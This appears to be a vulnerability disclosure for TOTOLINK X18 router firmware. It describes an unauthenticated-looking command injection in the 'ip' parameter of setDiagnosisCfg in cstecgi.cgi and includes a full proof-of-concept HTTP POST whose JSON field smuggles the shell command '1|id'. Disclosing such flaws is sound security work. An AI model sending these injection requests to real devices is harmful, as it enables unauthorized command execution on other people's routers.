TOTOLINKļ¼X18 V9.1.0cu.2024_B20220329
TOTOLINKļ¼X18 V9.1.0cu.2021_B20220326
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
The ip parameter of setDiagnosisCfg in the cstecgi.cgi is controllable, and there is no verification of the input ip parameter. It is executed directly after splicing through% s, and the command is executed after calling CsteSystem.
CsteSystem comes from the/usr/lib/libcscommon.so. Through analysis, you can know that the command will eventually be executed by calling/bin/bash through execv
Poc:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 58
Origin: <http://192.168.109.161>
Connection: close
Referer: <http://192.168.109.161/basic/mesh.html?timestamp=1667781517612>
Cookie: SESSION_ID=2:1667781512:2
{"ip": "1|id\\n","num":"2","topicurl":"setDiagnosisCfg"}
Test screenshot: